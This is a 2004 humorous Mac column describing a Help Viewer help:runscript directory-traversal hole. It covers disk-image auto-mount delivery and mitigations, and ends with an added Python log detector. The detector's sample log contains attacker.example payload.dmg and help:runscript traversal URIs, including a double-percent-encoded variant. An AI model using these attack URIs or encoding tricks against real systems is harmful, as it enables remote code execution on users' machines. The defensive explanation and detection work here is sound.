
Fun With(out) Security (5/17/04)

Woo-hoo, it's like we Mac users have been in Security Issue Heaven recently, isn't it? After years and years of watching forlornly as Windows users had all the fun, Macfolk are finally starting to see a little action these days. First there was that questionable but clever little demo Trojan in which executable code was hidden inside the ID3 tags of an MP3 file, so that opening what looked like a song actually ran that code. Then there was that fake Word 2004 installer floating around, which was just a "delete everything we can" script with a custom icon pasted on top-- not exactly a security hole, since any system that lets you delete your own files is susceptible to a program you willingly run, but still, it was a real piece of Mac OS X malware found in the wild.

And now there's this new hole in Mac OS X that apparently lets the bad guys use Help Viewer to run code on your system just by getting you to click a single link on a web site they set up. Faithful viewer Bernd Schnitker was the first to inform us that, as detailed by the security web site Secunia, "the 'help' URI handler allows execution of arbitrary local scripts (.scpt) via the classic directory traversal character sequence using 'help:runscript.'" In other words, Help Viewer is registered to handle help: URLs, it honors a help:runscript=... form that runs a script at the named location, and the "../" traversal sequence lets that location be anywhere on your disk rather than just inside Help Viewer's own folder; any web page can hand your browser such a link, and the script runs with your full user privileges. The only ingredient the attacker still needs is a script of his own sitting on your disk, and that's the easy part: a web page can automatically send you a .dmg disk image (which, with default settings, Safari and some other browsers will automatically mount under /Volumes), wait a little while for the mount to complete, and then redirect your browser to a help:runscript URI pointing at the script included on the mounted image.

Don't believe it could work? Well, the site insecure.ws not only has a description of the problem, but also put together a proof-of-concept web page that exploits the hole. Click here to see it in action; while it won't actually harm your system, it'll prove that it could if it wanted to: if you haven't messed with any relevant default Safari settings, you'll see a disk image mount on the Desktop, Help Viewer launch, and Terminal spawn a new window informing you that you've been compromised. That Terminal window is the whole point; a script that can open Terminal as you can do anything else you can do, including the file-deleting routine from that fake Word installer. Don't forget to toss that scary "owned.txt" file that the script slapped into your home directory just to make you sleep a little less soundly at night. (We don't sleep anyway, so we're thinking of keeping it around. It classes up the joint a little.)
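The whole chain leaves a recognizable footprint: a .dmg download followed within seconds by a help: URL of the runscript form whose target climbs out of Help Viewer's folder with "../" (or a percent-encoded version of it). The following is an added example for this page, not code from AtAT, Secunia or insecure.ws; it scans a constructed proxy-style log (the log format, host names and the owned.scpt path are all made up for illustration) and pairs each suspicious help:runscript request with the disk image fetched just before it.

```python
"""Detect the Help Viewer attack chain described above in a browsing or
proxy log: a .dmg download followed shortly by a help:runscript URI that
walks out of Help Viewer's directory with '../'.  Added example for this
page, not code from AtAT, Secunia or insecure.ws; the log format and the
log lines below are constructed, not captured from a real victim."""
import re
from datetime import datetime
from urllib.parse import unquote

# Constructed sample log: "<ISO timestamp> <method> <url> <status>".
SAMPLE_LOG = """\
2004-05-17T11:02:13 GET http://attacker.example/index.html 200
2004-05-17T11:02:14 GET http://attacker.example/payload.dmg 200
2004-05-17T11:02:20 GET help:runscript=../../../../Volumes/payload/owned.scpt -
2004-05-17T11:05:41 GET http://www.apple.com/ 200
2004-05-17T11:06:02 GET help:runscript=..%252F..%252FVolumes%2Fpayload%2Fowned.scpt -
2004-05-17T11:07:00 GET help:///Library/Documentation/Help/MacHelp.help/index.html -
"""

TRAVERSAL = re.compile(r"\.\.[/\\]")   # '../' or '..\' anywhere in the target


def decode_fully(s, max_rounds=3):
    """Undo percent-encoding until it stops changing (catches %252F tricks)."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify_url(url):
    """Return a reason string if the URL looks like part of the chain, else None."""
    scheme, sep, rest = url.partition(":")
    if not sep:
        return None
    scheme = scheme.lower()
    if scheme == "help":
        target = decode_fully(rest)
        # The dangerous form is help:runscript=<path>; plain help: URLs that
        # merely open a help book are normal Help Viewer traffic.
        if not target.lower().startswith("runscript"):
            return None
        if TRAVERSAL.search(target):
            return "help:runscript with directory traversal"
        if "/volumes/" in target.lower():
            return "help:runscript targeting a mounted volume"
        return "help:runscript script execution"
    if scheme in ("http", "https"):
        path = rest.split("?", 1)[0].split("#", 1)[0]
        if path.lower().endswith(".dmg"):
            return "disk image download (auto-mounted by default Safari settings)"
    return None


def scan_log(text):
    """Return (timestamp, url, reason) for every suspicious log line."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue
        ts = datetime.fromisoformat(fields[0])
        reason = classify_url(fields[2])
        if reason:
            hits.append((ts, fields[2], reason))
    return hits


def find_chains(hits, window_seconds=60):
    """Pair each help:runscript hit with a .dmg download seen shortly before it."""
    chains = []
    for ts, url, reason in hits:
        if not reason.startswith("help:runscript"):
            continue
        for prev_ts, prev_url, prev_reason in hits:
            if prev_reason.startswith("disk image") and \
               0 <= (ts - prev_ts).total_seconds() <= window_seconds:
                chains.append((prev_url, url))
    return chains


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ts, url, reason in found:
        print(ts.isoformat(), reason, url)
    for dmg, script in find_chains(found):
        print("CHAIN:", dmg, "->", script)
```

Two details matter in practice: the traversal check runs on the fully decoded target, because a link can hide "../" behind one or two layers of percent-encoding, and a help: URL without the runscript form is left alone so that ordinary Help Viewer lookups don't drown the real hits.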

For what it's worth, if you want to protect yourself from this sort of thing until Apple issues another Security Update, it's not too difficult. You can tell Safari (or whatever browser you use) not to mount downloaded disk images: uncheck "Open 'safe' files after downloading" in Safari's General preferences. That only breaks the delivery step, though; a script that's already on your disk, or on an image you mounted yourself, is still one help:runscript link away. The better fix is to use something like the More Internet preference pane to reassign the help URI handler to something other than Help Viewer, so a help: link from a web page never reaches the runscript code at all. Geez, three security issues of varying degrees of ickiness in the space of less than six weeks; multiply that by ten, and we'll almost be where Windows is! Enterprise sales, here we come!


This scene was taken from the 5/17/2004 episode:

Tuesday, 5:36 AM: Another Mac OS X security issue comes to light, and this one has a fun proof-of-concept web page. Meanwhile, Gwyneth Paltrow names her kid "Apple," and the G5 cluster at Virginia Tech may be vanishing from the next list of the top supercomputers...




DISCLAIMER: AtAT is not a news site any more than "Inside Edition" is a "real" news show. We make "Dawson's Creek" look like "60 Minutes." We engage in rampant guesswork, wild speculation, and pure fabrication for the entertainment of our viewers. Sure, everything here is "inspired by actual events," but so was "Amityville II: The Possession." So lighten up.


Everything you see here that isn't attributed to other parties is copyright ©1997-2005 J. Miller and may not be reproduced or rebroadcast without his explicit consent (or possibly the express written consent of Major League Baseball, but we doubt it).

